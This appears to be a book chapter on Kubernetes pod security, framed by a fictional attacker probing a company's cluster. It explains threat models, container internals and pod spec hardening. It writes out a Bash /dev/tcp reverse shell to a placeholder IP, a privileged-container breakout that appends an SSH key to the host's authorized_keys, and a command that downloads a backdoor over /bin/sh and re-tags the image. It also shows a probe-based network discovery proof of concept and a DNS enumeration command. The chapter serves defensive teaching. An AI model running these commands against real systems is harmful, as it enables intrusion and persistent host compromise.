In this chapter, we’ll start with the atomic unit of Kubernetes deployment: a pod. Pods run apps, and an app may be a single container or many working together in one or more pods.
We consider what bad things can happen in and around a pod, and look at how you can mitigate the risk of getting attacked.
As with any sensible security effort, we’ll begin by defining a lightweight threat model for your system, identifying the threat actors it defends against, and highlighting the most dangerous threats. This gives you a solid basis to devise countermeasures and controls, and take defensive steps to protect your customer’s valuable data.
We’ll go deep into the trust model of a pod and look at what is trusted by default, where we can tighten security with configuration, and what an attacker’s journey looks like.
Captain Hashjack started their assault on your systems by enumerating BCTL’s DNS subdomains and S3 buckets. These could have offered an easy way into the organisation’s systems, but there was nothing easily exploitable on this occasion. Undeterred, they now create an account on the public website and log in, using a web application scanner like OWASP ZAP (Zed Attack Proxy) to pry into API calls and application code for unexpected responses. They are on the search for leaking web-server banner and version information (to learn which exploits might succeed) and are generally injecting and fuzzing APIs for poorly handled user input.
This is not the level of scrutiny that your poorly maintained codebase and systems are likely to withstand for long. Attackers may be searching for a needle in a haystack, but the safest haystack has no needles at all.
Any computer should be resistant to this type of indiscriminate attack: a Kubernetes system should achieve “minimum viable security” through the capability to protect itself from casual attack with up-to-date software and hardened configuration. Kubernetes encourages regularly updates by supporting the last three minor releases (e.g. 1.24, 1.23, and 1.22), which are released every 4 months and ensure a year of patch support. Older versions are unsupported and likely to be vulnerable.
Although many parts of an attack can be automated, this is an involved process. A casual attacker is more likely to scan widely for software paths that trigger published CVEs and run automated tools and scripts against large ranges of IPs (such as the ranges advertised by public cloud providers). These are noisy approaches.
If a vulnerability in your application can be used to run untrusted (and in this case, external) code, it is called an RCE (remote code execution). An adversary can use an RCE to spawn a remote control session into the application’s environment: here it is the container handling the network request, but if the RCE manages to pass untrusted input deeper into the system, it may exploit a different process, pod, or cluster.
Your first goal of Kubernetes and pod security should be to prevent remote code execution (RCE), which could be as
simple as a kubectl exec
, or as complex as a reverse shell, such as the one demonstrated in Figure 2-1:
Application code changes frequently and may hide undiscovered bugs, so robust AppSec practices (including IDE and CI/CD integration of tooling and dedicated security requirements as task acceptance criteria) are essential to keep an attacker from compromising the processes running in a pod.
The Java framework Struts was one of the most widely deployed libraries to suffer a remotely exploitable vulnerability (CVE-2017-5638), which contributed to the breach of Equifax customer data. To fix a supply chain vulnerability like this in a container, it is quickly rebuilt in CI with a patched library, and redeployed, reducing the risk window of vulnerable libraries being exposed to the internet. We examine other ways to get remote code execution throughout the book.
With that, let’s move on to the network aspects.
The greatest attack surface, see also of a Kubernetes cluster is its network interfaces and public-facing pods, and network-facing services such as web servers are first line of defence in keeping your clusters secure, a topic we will dive into in Chapter 5.
This is because unknown users coming in from across the network scan network-facing applications for the exploitable signs of RCE. They can use automated network scanners to attempt to exploit known vulnerabilities and input-handling errors in network-facing code. If a process or system can be forced to run in an unexpected way, there is the possibility that it can be compromised through these untested logic paths.
To investigate how an attacker may establish a foothold in a remote system using only the humble, all-powerful Bash shell, see for example Chapter 16 of Cybersecurity Ops with bash.
To defend against this, we must scan containers for operating system and application CVEs in the hope of updating them before they are exploited.
If Captain Hashjack has an RCE into a pod, it’s a foothold to attack your system more deeply from the pod’s network position. You should strive to limit what an attacker can do from this position, and customise your security configuration to a workload’s sensitivity. If your controls are too loose, this may be the beginning of an organisation-wide breach for your employer, BCTL.
For an example of spawning a shell via Struts with Metasploit, see Sam Bowne’s guide.
As Captain Hashjack has just discovered, we have also been running a vulnerable version of the Struts library. This offers an opportunity to start attacking the cluster from within.
A simple Bash reverse shell like this one is a good reason to remove Bash from your containers. It uses Bash’s
virtual /dev/tcp/
filesystem, and is not exploitable in sh
which doesn’t include this oft-abused feature:
revshell()
{
local
DEFAULT_IP
=
"
${
1
:-
123
.123.123.123
}
"
;
local
DEFAULT_PORT
=
"
${
2
:-
1234
}
"
;
while
:;
do
nohup bash -i&
> /dev/tcp/${
DEFAULT_IP
}
/${
DEFAULT_PORT
}
0>&
1;
sleep 1;
done
}
As the attack begins, let’s take a look at where the pirates have landed: inside a Kubernetes pod.
Multiple cooperating containers can be logically grouped into a single pod, and every container Kubernetes runs must run inside a pod. Sometimes a pod is called a “workload”, which is one of many copies of the same execution environment. Each pod must run on a Node in your Kubernetes cluster as shown in Figure 2-2.
A pod is a single instance of your application, and to scale to demand, many identical pods are used to replicate the application by a workload resource such as a Deployment, DaemonSet, or StatefulSet.
Your pods may include sidecar containers supporting monitoring, network, and security and “init” containers for pod bootstrap, enabling you to deploy different application styles. These sidecars are likely to have elevated privileges and be of interest to an adversary.
“Init” containers run in order (first to last) to set up a pod and can make security changes to the namespaces, like Istio’s init container configuring the pod’s iptables (in the kernel’s netfilter) so the runtime pods route traffic through a sidecar container. Sidecars run alongside the primary container in the pod, and all non-init containers in a pod start at the same time.
Kubernetes is a distributed system, and ordering of actions (like applying a multi-doc YAML file) is eventually consistent, meaning that API calls don’t always complete in the order that you expect. Ordering depends on various factors and shouldn’t be relied upon: as Tabitha Sable likes to say, Kubernetes is “a friendly robot that uses control theory to make our hopes and dreams manifest… so long as your hopes and dreams can be expressed in YAML”.
What’s inside a pod? Cloud native applications are often microservices, web servers, workers and batch processes. Some pods run one-shot tasks (wrapped with a job, or maybe one single non-restarting container), perhaps running multiple other pods to assist. All these pods present an opportunity to an attacker. Pods get hacked. Or, more often, a network-facing container process gets hacked.
A pod is a trust boundary encompassing all the containers inside, including their identity and access. There is still separation between pods that you can enhance with policy configuration, but you should consider the entire contents of a pod when threat modelling it.
A pod is a Kubernetes invention: an environment for multiple containers to run inside. It is the smallest deployable unit you can ask Kubernetes to run. A pod has its own IP address, can mount in storage, and its namespaces surround the containers created by the container runtime (e.g. containerd, CRI-O).
A container is a mini-Linux, its processes containerised with control groups
(cgroups
) to limit resource usage and namespaces to limit access. A variety of other
controls can be applied to restrict a containerised process’s behaviour, as we’ll see in this chapter.
The lifecycle of a pod is controlled by the kubelet
, the Kubernetes API server’s deputy, deployed on each node in the
cluster to manage and run containers. If the kubelet
loses contact with the API server, it will continue to manage its
workloads, restarting them if necessary. If the kubelet
crashes, the container manager will also keep containers running
in case they crash. The Kubelet and container manager oversee your workloads.
The kubelet
runs pods on worker nodes by instructing the container runtime and configuring network and storage. Each
container in a pod is a collection of Linux namespaces, cgroups, capabilities, and Linux Security Modules (LSMs). As the
container runtime builds a container, each namespace is created and configured individually before being combined into
a container.
Capabilities are individual switches for “special” root user operations such as changing any file’s permissions, loading modules into the kernel, accessing devices in raw mode (e.g. networks and IO), BPF and performance monitoring, and every other operation.
The root user has all capabilities, and capabilities can be granted to any process or user (“ambient capabilities”). Excess capability grants may lead to container breakout, as we see later in this chapter.
In Kubernetes, a newly-created container is added to the pod by the container runtime, where it shares network and interprocess communication namespaces between pod containers.
Figure 2-4 shows a Kubelet running four individual pods on a single node.
The container is the first line of defence against an adversary, and container images should be scanned for CVEs before being run. This simple step reduces the risk of running an outdated or malicious container and informs your risk-based deployment decisions: do you ship to production, or is there an exploitable CVE that needs patching first?
"Official" container images in public registries have a greater likelihood of being up to date and well-patched, and Docker Hub signs all official images with Notary as we'll see in <<ch-apps-supply-chain>>.
Public container registries often host malicious images, so detecting them before production is essential. Figure 2-5 shows how this might happen.
The kubelet
attaches pods to a container network interface (CNI). CNI network traffic is treated as layer 4 TCP/IP
although the underlying network technology used by the CNI plugin may differ.
Although starting a malicious container under a correctly configured container runtime is usually safe, there have been
attacks against the container bootstrap phase. We examine the /proc/self/exe
breakout CVE-2019-5736
later in this
chapter.
The Kubelet attaches pods to a container network interface (CNI). CNI network traffic is treated as layer 4 TCP/IP (although the underlying network technology used by the CNI plugin may differ), and encryption is the job of the CNI plugin, the application, a service mesh, or at a minimum, the underlay networking between the nodes. If traffic is unencrypted, it may be sniffed by a compromised pod or node.
Pods can also have storage attached by Kubernetes, using the CSI (Container Storage Interface), which includes the PersistentVolumeClaim and StorageClass seen in Figure 2-6. In Chapter 6 we will get deeper into the storage aspects.
Vulnerabilities have been found in many storage drivers, including CVE-2018-11235
, which exposed a Git attack on the
gitrepo
storage volume, and CVE-2017-1002101
, a subpath volume mount mishandling error. We will cover these in
Chapter 6.
In Figure 2-6 you can see a view of the control plane and the API server’s central role in the cluster. The API Server is responsible for interacting with the cluster data store (etcd), hosting the cluster’s extensible API surface, and managing the Kubelets. If the API server or etcd instance is compromised, the attacker has complete control of the cluster: these are the most sensitive parts of the system.
For performance in larger clusters, the control plane should run on separate infrastructure to etcd, which requires high disk and network I/O to support reasonable response times for its distributed consensus algorithm, Raft.
As the API server is the etcd
cluster’s only client, compromise of either
effectively roots the cluster: due to Kubernetes’ asyncronous scheduling the
injection of malicious, unscheduled pods into etcd will trigger their scheduling
to a Kubelet.
As with all fast-moving software, there have been vulnerabilities in most parts of Kubernetes’ stack. The only solution to running modern software is a healthy continuous integration infrastructure capable of promptly redeploying vulnerable clusters upon a vulnerability announcement.
Okay, so we have a high-level view of a cluster. But at a low level, what is a “container”? It is a microcosm of Linux that gives a process the illusion of a dedicated kernel, network, and userspace. Software trickery fools the process inside your container into believing it is the only process running on the host machine. This is useful for isolation and migration of your existing workloads into Kubernetes.
As Christian Brauner and Stephane Graber like to say “(Linux) containers are a userspace fiction”, a collection of configurations that present an illusion of isolation to a process inside. Containers emerged from the primordial kernel soup, a child of evolution rather than intelligent design that has been morphed, refined, and coerced into shape so that we now have something usable.
Containers don’t exist as a single API, library, or kernel feature. They are merely the resultant bundling and isolation that’s left over once the kernel has started a collection of namespaces, configured some cgroups and capabilities, added Linux Security Modules like AppArmor and SELinux, and started our precious little process inside.
A container is a process in a special environment with some combination of namespaces either enabled or shared with the
host (or other containers). The process comes from a container image, a TAR file containing the container’s root
filesystem, its application(s), and any dependencies. When the image is unpacked into a directory on the host and a
special filesystem “pivot root” is created, a “container” is constructed around it, and its ENTRYPOINT
is run from the
filesystem within the container. This is roughly how a container starts, and each container in a pod must go through
this process.
Container security has two parts: the contents of the container image, and its runtime configuration and security context. An abstract risk rating of a container can be derived from the number of security primitives it enables and uses safely (avoiding host namespaces, limiting resource use with cgroups, dropping unneeded capabilities, tightening security module configuration for the process’s usage pattern, and minimising process and filesystem ownership and contents). Kubesec.io rates a pod configuration’s security on how well it enables these features at runtime.
When the kernel detects a network namespace is empty, it will destroy the namespace, removing any IPs allocated to network adapters in it. For a pod with only a single container to hold the network namespace’s IP allocation, a crashed and restarting container would have a new network namespace created and so have a new IP assigned. This rapid churn of IPs would create unnecessary noise for your operators and security monitoring, and so Kubernetes uses the almighty pause container to hold the pod’s shared network namespace open in the event of a crash-looping tenant container. This container is invisible via the Kubernetes API but visible to the container runtime on the host:
[email protected]:~ [0]$ docker ps --format '{{.ID}} {{.Image}} {{.Names}}' | grep sublimino- 92bfb60ce6f1 busybox k8s_alpine_sublimino-frontend-5cc74f44b8-4z86v_default_845db3d9-780d-49e5-bcdf-bc91b2cf9cbe_0 21d86e7b4faf k8s.gcr.io/pause:3.1 k8s_POD_sublimino-frontend-5cc74f44b8-4z86v_default_845db3d9-780d-49e5-bcdf-bc91b2cf9cbe_1 ... adcddc431673 busybox k8s_alpine_sublimino-microservice-755d97b46b-xqrw9_default_1eaeaf4c-3a22-4fc9-a154-036e5381338b_0 1a9dcc794b23 k8s.gcr.io/pause:3.1 k8s_POD_sublimino-microservice-755d97b46b-xqrw9_default_1eaeaf4c-3a22-4fc9-a154-036e5381338b_1 ... fa6ac946cf38 busybox k8s_alpine_sublimino-frontend-5cc74f44b8-hnxz5_default_9ba3a8c2-509d-41e0-8771-f38bec5216eb_0 6dbd4f68c9f2 k8s.gcr.io/pause:3.1 k8s_POD_sublimino-frontend-5cc74f44b8-hnxz5_default_9ba3a8c2-509d-41e0-8771-f38bec5216eb_1
A group of containers in a pod share a network namespace, so all your container’s ports are available on the same
network adapter to any container in the pod. This gives an attacker in one container of the pod a chance to attack
private sockets available on any network interface, including the loopback adapter 127.0.0.1
.
We examine these concepts in greater detail in Chapters 5 and 6.
Each container runs in a root filesystem from its container image that is not shared between containers. Volumes must be mounted into each container in the pod configuration, but a pod’s volumes may be available to all containers if configured that way, as Figure 2-3 shows.
Here we see Figure 2-7 with some of the paths inside a container workload that an attacker may be interested in (note the user and time namespaces are not currently in use):
User namespaces are the ultimate kernel security frontier, and are generally not enabled due to historically being likely entry points for kernel attacks: everything in Linux is a file, and user namespace implementation cuts across the whole kernel, making it more difficult to secure than other namespaces.
The special virtual filesystems listed here are all possible paths of breakout if misconfigured and accessible inside
the container: /dev
may give access to the host’s devices, /proc
can leak process information, or /sys
supports
functionality like launching new containers.
A Chief Information Security Officer (CISO) is responsible for the organisation’s security. Your role as a CISO means you should consider worst case scenarios, to ensure that you have appropriate defences and mitigations in place. Attack trees help to model these negative outcomes, and one of the data sources you can use is the Threat Matrix as shown in Figure 2-8.
But there are some threats missing, and the community has added some (thanks to Alcide, and Brad Geesaman and Ian Coldwater again), as shown in Figure 2-9:
Initial Access (Popping a shell pt 1 - prep) | Execution (Popping a shell pt 2 - exec) | Persistence (Keeping the shell) | Privilege Escalation (Container breakout) | Defense Evasion (Assuming no IDS) | Credential Access (Juicy creds) | Discovery (Enumerate possible pivots) | Lateral Movement (Pivot) | Command & Control (C2 methods) | Impact (Dangers) |
---|---|---|---|---|---|---|---|---|---|
Using Cloud Credentials - service account keys, impersonation |
Exec Into Container (bypass admission control policy) |
Backdoor Container (add a reverse shell to local or container registry image) |
Privileged container (legitimate escalation to host) |
Clear Container Logs (covering tracks after host breakout) |
List K8s Secrets |
List K8s API Server (nmap, curl) |
Access Cloud Resources (workload identity and cloud integrations) |
Dynamic Resolution (DNS tunnelling) |
Data Destruction (datastores, files, NAS, ransomware…) |
Compromised Images In Registry (supply chain unpatched or malicious) |
BASH/CMD Inside Container (Implant or trojan, RCE/reverse shell, malware, C2, DNS tunnelling) |
Writable Host Path Mount (host mount breakout) |
Cluster Admin Role Binding (untested RBAC) |
Delete K8s Events (covering tracks after host breakout) |
Mount Service Principal (Azure specific) |
Access Kubelet API |
Container Service Account (API server) |
App Protocols (L7 protocols, TLS, …) |
Resource Hijacking (cryptojacking, malware c2/distribution, open relays, botnet membership) |
Application Vulnerability (supply chain unpatched or malicious) |
Start New Container (with malicious payload: persistence, enumeration, observation, escalation) |
K8s CronJob (reverse shell on a timer) |
Access Cloud Resources (metadata attack via workload identity) |
Connect From Proxy Server (to cover source IP, external to cluster) |
Applications Credentials In Config Files (key material) |
Access K8s Dashboard (UI requires service account credentials) |
Cluster Internal Networking (attack neighbouring pods or systems) |
Botnet (k3d, or traditional) |
Application DoS |
KubeConfig File (exfiltrated, or uploaded to the wrong place) |
Application Exploit (RCE) |
Static Pods (reverse shell, shadow API server to read audit-log-only headers) |
Pod hostPath Mount (logs to container breakout) |
Pod/Container Name Similarity (visual evasion, cronjob attack) |
Access Container Service Account (RBAC lateral jumps) |
Network Mapping (nmap, curl) |
Access Container Service Account (RBAC lateral jumps) |
Node Scheduling DoS |
|
Compromise User Endpoint (2FA and federating auth mitigate) |
SSH Server Inside Container (bad practice) |
Injected Sidecar Containers (malicious mutating webhook) |
Node To Cluster Escalation (stolen credentials, node label rebinding attack) |
Dynamic Resolution (DNS) (DNS tunnelling/exfiltration) |
Compromise Admission Controllers |
Instance Metadata API (workload identity) |
Host Writable Volume Mounts |
Service Discovery DoS |
|
K8s API Server Vulnerability (needs CVE and unpatched API server) |
Container Life Cycle Hooks (postStart and preStop events in pod yaml) |
Rewrite Container Life Cycle Hooks (postStart and preStop events in pod yaml) |
Control Plane To Cloud Escalation (keys in secrets, cloud or control plane credentials) |
Shadow admission control or API server |
Compromise K8s Operator (sensitive RBAC) |
Access K8s Dashboard |
PII or IP exfiltration (cluster or cloud datastores, local accounts) |
||
Compromised host (credentials leak/stuffing, unpatched services, supply chain compromise) |
Rewrite Liveness Probes (exec into and reverse shell in container) |
Compromise Admission Controller (reconfigure and bypass to allow blocked image with flag) |
Access Host File System (host mounts) |
Access Tiller Endpoint (Helm v3 negates this) |
Container pull rate limit DoS (container registry) |
||||
Compromised etcd (missing auth) |
Shadow admission control or API server (privileged RBAC, reverse shell) |
Compromise K8s Operator (compromise flux and read any secrets) |
Access K8s Operator |
SOC/SIEM DoS (event/audit/log rate limit) |
|||||
K3d botnet (secondary cluster running on compromised nodes) |
Container breakout (kernel or runtime vulnerability e.g. Dirtycow, /proc/self/exe, eBPF verifier bugs, Netfilter) |
We’ll explore these threats in detail as we progress through the book. But the first threat, and the greatest risk to the isolation model of our systems, is an attacker breaking out of the container itself.
A cluster admin’s worst fear is a container breakout, that is, a user or process inside a container that can run code outside of the container’s execution environment.
Speaking strictly, a container breakout should exploit the kernel, attacking the code a container is supposed to be constrained by. In the authors’ opinion any avoidance of isolation mechanisms breaks the contract the container’s maintainer or operator thought they had with the process(es) inside. This means it should be considered equally threatening to the security of the host system and its data, so we define container breakout to include any evasion of isolation.
Container breakouts may occur in various ways:
an “exploit” including against the kernel, network or storage stack, or container runtime
a “pivot” such as attacking exposed local, cloud, or network services, or escalating privilege and abusing discovered or inherited credentials
or most likely just a misconfiguration that allows an attacker an easier or legitimate path to exploit or pivot
If the running process is owned by an unprivileged user (that is, one with no root capabilities), many breakouts are not possible. In that case the process or user must gain capabilities with a local privilege escalation inside the container before attempting to break out.
Once this is acheived, a breakout may start with a hostile root-owned process running in a poorly-configured container.
Access to the root user’s capabilities within a container is the precursor to most escapes: without root (and sometimes
CAP_SYS_ADMIN
), many breakouts are nullified.
The securityContext
and LSM configurations are vital to constrain unexpected activity from zero day vulnerabilities,
or supply chain attacks (library code loaded into the container and exploited automatically at runtime).
You can
define the active user, group, and filesytem group (set on mounted volumes to ensure readability, gated by
fsGroupChangePolicy
) in your workloads’ security contexts, and enforce it with admission control (see
Chapter 8), as this
example
from the docs shows:
apiVersion
:
v1
kind
:
Pod
metadata
:
name
:
security-context-demo
spec
:
securityContext
:
runAsUser
:
1000
runAsGroup
:
3000
fsGroup
:
2000
containers
:
-
name
:
sec-ctx-demo
# ...
securityContext
:
allowPrivilegeEscalation
:
false
# ...
In a container breakout scenario, if the user is root inside the container and has mount capabilities
(granted by default under CAP_SYS_ADMIN
, which root has unless dropped), they can interact with virtual and physical
disks mounted into the container. If the container is privileged (which amongst other things disables masking of kernel paths in /dev
),
it can see and mount the host filesystem.
# inside a privileged container
[email protected]:~[
0]
$
ls -lasp /dev/ [email protected]:~[
0]
$
mount /dev/xvda1 /mnt/# write into host filesystem's /root/.ssh/ folder
[email protected]:~[
0]
$
cat MY_PUB_KEY >> /mnt/root/.ssh/authorized_keys
We look at nsenter
privileged container breakouts which escape more elegantly
by entering the host’s namespaces in Chapter 6.
While you should prevent this attack easily by avoiding the root user and privilege mode, and enforcing that with admission control, it’s an indication of just how slim the container security boundary can be if misconfigured.
An attacker controlling a containerised process may have control of the networking, some or all of the storage, and potentially other containers in the pod. Containers generally assume other containers in the pod are friendly as they share resources, and we can consider the pod as a trust boundary for the processes inside. Init containers are an exception: they complete and shut down before the main containers in the pod start, and as they operate in isolation may have more security sensitivity.
The container and pod isolation model relies on the Linux kernel and container runtime, both of which are generally robust when not misconfigured. Container breakout occurs more often through insecure configuration than kernel exploit, although zero-day kernel vulnerabilities are inevitably devastating to Linux systems without correctly configured LSMs (Linux Security Modules, such as SELinux and AppArmor).
In “Architecting Containerised Applications for Resilience” we explore how the Linux Dirtycow vulnerability could break out of insecurely configured containers. One of the authors live demoed fixing the breakout with AppArmor.
Container escape is rarely plain sailing, and any fresh vulnerabilities are often patched shortly after disclosure. Only occasionally does a kernel vulnerability result in an exploitable container breakout, and the opportunity to harden individually containerised processes with LSMs enables defenders to tightly constrain high-risk network-facing processes; it may entail one or more of:
finding a zero-day in the runtime or kernel
exploiting excess privilege and escaping using legitimate commands
evading misconfigured kernel security mechanisms
introspection of other processes or filesystems for alternate escape routes
sniffing network traffic for credentials
attacking the underlying orchestrator or cloud environment
Vulnerabilities in the underlying physical hardware often can’t be defended against in a container.
For example, Spectre
and Meltdown
, CPU speculative execution attacks, and rowhammer
, TRRespass
,
and SPOILER
(DRAM memory attacks) bypass container isolation mechanisms as they cannot intercept
the entire instruction stream that a CPU processes. Hypervisors suffer the same lack of possible protection.
Finding new kernel attacks is hard. Misconfigured security settings, exploiting published CVEs, and social engineering attacks are easier. But it’s important to understand the range of potential threats in order to decide your own risk tolerance.
We’ll go through a step-by-step security feature exploration to see a range of ways in which your systems may be attacked in the Appendix.
For more information on how the Kubernetes project manages CVEs, see Exploring container security: Vulnerability management in open-source Kubernetes.
We’ve spoken generally about various parts of a pod, so let’s finish off by going into depth on a pod spec to call out any gotchas or potential footguns.
In order to secure a pod or container, the container runtime should be minimally viably secure, that is: not hosting
sockets to unauthenticated connections (e.g. /var/run/docker.sock
and tcp://127.0.0.1:2375
) as it leads to host takeover.
For the purpose of this example, we are using a frontend
pod from the
GoogleCloudPlatform/microservices-demo
application, and it
was deployed with kubectl create -f
https://raw.githubusercontent.com/GoogleCloudPlatform/microservices-demo/master/release/kubernetes-manifests.yaml
.
We have updated and added some extra configuration where relevant for demonstration purposes.
The standard header we know and love, defining the type of entity this YAML defines, and its version:
apiVersion
:
v1
kind
:
Pod
Metadata and annotations may contain sensitive information like IPs security hints (in this case, for Istio), although this is only useful if the attacker has read-only access:
metadata
:
annotations
:
seccomp.security.alpha.kubernetes.io/pod
:
runtime/default
cni.projectcalico.org/podIP
:
192.168.155.130/32
cni.projectcalico.org/podIPs
:
192.168.155.130/32
sidecar.istio.io/rewriteAppHTTPProbers
:
"true"
It also historically holds the seccomp
, AppArmor
, and SELinux
policies:
metadata
:
annotations
:
container.apparmor.security.beta.kubernetes.io/hello
:
localhost/k8s-apparmor-example-deny-write
We look at how to use these annotation with in the runtime policies section.
After many years in purgatorial limbo, seccomp
in Kubernetes progressed to General Availability in v1.19
This changes the syntax from an annotation to a securityContext
entry:
securityContext
:
seccompProfile
:
type
:
Localhost
localhostProfile
:
my-seccomp-profile.json
The Kubernetes Security Profiles Operator (SPO) can install seccomp profiles on your nodes (a prerequisite to their use by the container runtime), and record new profiles from workloads in the cluster with oci-seccomp-bpf-hook.
The SPO also supports SELinux via selinuxd, with plenty of details in this blog post.
AppArmor is still in beta but annotations will be replaced with first-class fields like seccomp once it graduates to GA.
Let’s move on to a part of the pod spec that is not write-able by the client but contains some important hints.
When you dump a pod sepc from the API server (using for example kubectl get -o
yaml
) it includes the pod’s start time:
creationTimestamp
:
"2021-05-29T11:20:53Z"
Pods running for longer than a week or two are likely to be at higher risk of bugs. Sensitive workloads running for more than 30 days will be safer if they’re rebuilt in CI/CD to account for library or operating system patches.
Pipeline scanning the existing container image offline for CVEs can be used to inform rebuilds. The safest approach is to combine both: “repave” (that is, rebuild and redeploy containers) regularly, and rebuild through the CI/CD pipelines whenever a CVE is detected.
Labels in Kubernetes are not validated or strongly typed: they are metadata. Labels are targeted by things like services and controllers using selectors for referencing, and are also used for security features such as Network Policy.
labels
:
app
:
frontend
type
:
redish
Typos in labels mean they do not match the intended selectors, and so can inadvertently introduce security issuess such as:
exclusions from expected network policy or admission control policy
unexpected routing from service target selectors
“rogue” pods that are not accurately targeted by operators or observability tooling
Managed fields was introduced in v1.18 and supports server-side apply. They duplicate information from elsewhere in the pod spec are of limited interest to us as we can read the entire spec from the API server. They look like this:
managedFields
:
-
apiVersion
:
v1
fieldsType
:
FieldsV1
fieldsV1
:
f:metadata
:
f:annotations
:
.
:
{}
f:sidecar.istio.io/rewriteAppHTTPProbers
:
{}
# ...
f:spec
:
f:containers
:
k:{"name":"server"}
:
# ...
f:image
:
{}
f:imagePullPolicy
:
{}
f:livenessProbe
:
# ...
We know the pods’s name and namespace from the API request we made to retrieve it.
If we used --all-namespaces
to return all pod configurations, this shows us the namespace:
name
:
frontend-6b887d8db5-xhkmw
namespace
:
default
From within a pod it’s possible to infer the current namespace from the DNS resolver configuration in /etc/resolv.conf
(which is secret-namespace
in this example):
$
grep -o"search [^ ]*"
/etc/resolv.conf search secret-namespace.svc.cluster.local
Other less-robust options include the mounted service account (assuming it’s in the same namespace, which it may not be), or the cluster’s DNS resolver (if you can enumerate or scrape it).
Now we’re getting into interesting configuration. We want to see the environment variables in a pod, partially because they may leak secret information (which should have been mounted as a file), and also because they may list which other services are available in the namespace and so suggest other network routes and applications to attack:
As you can see, passwords set in deployment and pod YAML is visible to the operator that deploys the YAML, the process at runtime and any other processes that can read its environment, and to anybody that can read from the Kubernetes or Kubelet APIs.
Here we see the container’s PORT
(which is good practice and required by applications running in Knative and
some other systems), the DNS names and ports of its coordinating services, some badly-set database config and
credentials, and finally a sensibly-referenced secret file.
spec
:
containers
:
-
env
:
-
name
:
PORT
value
:
"8080"
-
name
:
CURRENCY_SERVICE_ADDR
value
:
currencyservice:7000
-
name
:
SHIPPING_SERVICE_ADDR
value
:
shippingservice:50051
# These environment variables should be set in secrets
-
name
:
DATABASE_ADDR
value
:
postgres:5432
-
name
:
DATABASE_USER
value
:
secret_user_name
-
name
:
DATABASE_PASSWORD
value
:
the_secret_password
-
name
:
DATABASE_NAME
value
:
users
# This is a safer way to reference secrets and configuration
-
name
:
MY_SECRET_FILE
value
:
/mnt/secrets/foo.toml
That wasn’t too bad, right? Let’s move on to container images.
The container image’s filesystem is of paramount importance to an attacker, as it may hold vulnerabilities that assist in privilege escalation. If you’re not patching regularly Captain Hashjack might get the same image from a public registry to scan it for vulnerabilities they may be able to exploit. Knowing what binaries and files are available also enables attack planning “offline”, so adversaries can be more stealthy and targeted when attacking the live system.
The OCI registry specification allows arbitrary image layer storage: it’s a two-step process and the first step uploads the manifest, with the second uploading the blob. If an attacker only performs the second step an attacker gains free arbitrary blob storage.
Most registries don’t index this automatically (with Harbour being the exception), and so they will store the “orphaned” layers forever, potentially hidden from view until manually garbage collected.
Here we see an image referenced by label, which means we can’t tell what the actual SHA256 hash digest of the container image is. The container tag could have been updated since this deployment as it’s not referenced by digest.
image
:
gcr.io/google-samples/microservices-demo/frontend:v0.2.3
Instead of using image tags, we can use the SHA256 image digests to pull the image by its content address:
image
:
docker run -it gcr.io/google-samples/microservices-demo/[email protected]:ca5c0f0771c89ec9dbfcbb4bfbbd9a048c25f7a625d97781920b35db6cecc19c
Images should always be referenced by SHA256, or use signed tags, otherwise it’s impossible to know what’s running as the label may have been updated in the registry since the container start. You can validate what’s being run by inspecting the running container for its image’s SHA256.
It’s possible to specifiy both a tag and an SHA256 digest in a Kubernetes image:
key, in which case the tag is
ignored and the image is retrieved by digest. This leads to potentially confusing image definitions such as
controlplane/bizcard:[email protected]:649f3a84b95ee84c86d70d50f42c6d43ce98099c927f49542c1eb85093953875
being retrieved as the image matching the SHA rather than the tag.
If an attacker can influence the local Kubelet image cache, they can add malicious code to an image and re-label it on the host node:
# load a malicious Bash/sh backdoor and overwrite the container's default CMD (/bin/sh)
$
docker run -it --cidfile=
cidfile --entrypoint /bin/busyboxgcr.io/google-samples/microservices-demo/frontend:v0.2.3
wget https://securi.fyi/b4shd00r -O /bin/sh
# commit the changed container using the same
$
docker commit$(
<cidfile)
gcr.io/google-samples/microservices-demo/frontend:v0.2.3# to run this again, don't forget to remove the cidfile
While the compromise of a local registry cache may lead to this attack, container cache access probably comes by rooting the node, and so this may be the least of your worries.
The image pull policy of Always
has a performance drawback in a highly dynamic,
“autoscaling from zero” environments such as Knative. When startup times
are crucial, a potentially multi-second imagePullPolicy latency is unacceptable
and image digests must be used.
This attack on a local image cache can be mitigated with an image pull policy of Always
,
that will ensure the local tag matches what’s defined in the registry it’s pulled from.
This is important and you should always be mindful of this setting:
imagePullPolicy
:
Always
Typos in container image names, or registry names, will deploy unexpected code if an adversary has “typosquatted” the image with a malicious container.
This can be difficult to detect, for example, controlplan/hack
instead of controlplane/hack
.
Tools like Notary protect against this by checking for valid signatures from trusted parties.
If a TLS-intercepting middleware box intercepts and rewrites an image tag,
a spoofed image may be deployed. Again, TUF and Notary side-channel signing
mitigates against this, as do other container signing approaches like cosign
,
as discussed in Chapter 4.
Your liveness probes should be tuned to your application’s performance characteristics, and used to keep them alive in the stormy waters of your production environment. Probes inform Kubernetes if the application is incapable of fulfilling its specified purpose, perhaps through a crash or external system failure.
The Kubernetes audit finding TOB-K8S-024 shows
probes can be subverted by an attacker with the ability to schedule pods: without changing the pod’s command
or args
they have the power to make network requests and execute commands within the target container. This
yields local network discovery to an attacker as the probes are executes by the Kubelet on the host networking
interface, and not from within the pod.
A host
header can be used here to enumerate the local network. Their proof of concept exploit:
apiVersion
:
v1
kind
:
Pod
# ...
livenessProbe
:
httpGet
:
host
:
172.31.6.71
path
:
/
port
:
8000
httpHeaders
:
-
name
:
Custom-Header
value
:
Awesome
Resource limits and requests which manage the pod’s cgroups
prevent the exhaustion of finite memory and compute
resources on the Kubelet host, and defend from fork bombs and runaway processes. Networking bandwidth limits are not
supported in the pod spec, but may be supported by your CNI implementation.
cgroups
are a useful resource constraint. cgroups
v2 offers more protection, but cgroups
v1 are not a security boundary and
they can be escaped easily.
Limits restrict the potential cryptomining or resource exhaustion that a malicious container can execute. It also stops the host becoming overwhelmed by bad deployments. It has limited effectiveness against an adversary looking to further exploit the system unless they need to use a memory-hungry attack.
resources
:
limits
:
cpu
:
200m
memory
:
128Mi
requests
:
cpu
:
100m
memory
:
64Mi
By default Kubernetes DNS servers provide all records for services across the cluster, preventing namespace segregation unless deployed individually per-namespace or domain.
CoreDNS supports policy plugins, including Open Policy Agent, to restrict access to DNS records and defeat the following enumeration attacks.
The default Kubernetes CoreDNS installation leaks information about its services, and offers an attacker a view of all possible network endpoints. Of course they may not all be accessible due to network policy.
DNS enumeration can be performed against a default, unrestricted CoreDNS installation. To retrieve all services in the cluster namespace:
[email protected]:/[
0]
# dig +noall +answer srv any.any.svc.cluster.local | sort --human-numeric-sort --key 7
